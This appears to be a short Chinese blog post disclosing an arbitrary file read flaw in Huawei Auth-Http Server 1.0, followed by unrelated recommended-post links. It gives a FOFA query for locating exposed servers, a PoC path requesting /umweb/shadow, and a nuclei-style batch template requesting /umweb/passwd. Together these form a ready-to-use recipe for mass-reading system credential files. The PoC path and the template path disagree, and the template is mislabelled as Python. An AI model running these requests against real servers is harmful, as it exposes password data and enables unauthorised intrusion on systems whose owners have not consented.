华为Auth-Http Serve任意文件读取

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFA:server="Huawei Auth-Http Server 1.0"

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

python 复制代码
id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'
相关推荐
从零开始的ops生活1 小时前
【Day 80】Linux-NAS 和 SAN 存储
linux·运维·php
せいしゅん青春之我2 小时前
[JavaEE初阶] 防止网络传输中的中间人入侵---证书
服务器·网络·网络协议·java-ee
Wang's Blog2 小时前
Linux小课堂: 输入重定向与管道操作详解
linux·运维·服务器
w23617346013 小时前
Linux 服务器安全巡检与加固:从命令到实操(CentOS/Ubuntu 通用)
linux·服务器·安全·安全加固·安全巡检
TG_yunshuguoji4 小时前
阿里云云代理商:阿里云CDN刷新机制是什么?
服务器·阿里云·云计算
python百炼成钢4 小时前
3.Linux 网络相关
linux·运维·网络·stm32·单片机
Jtti4 小时前
香港硬防服务器防御DDOS攻击的优点
运维·服务器·ddos
lpfasd1236 小时前
第2部分:Netty核心架构与原理解析
运维·服务器·架构
若尘拂风6 小时前
centos 7.9 编译安装 freeswitch 1.10.12
服务器·udp·freeswitch·sip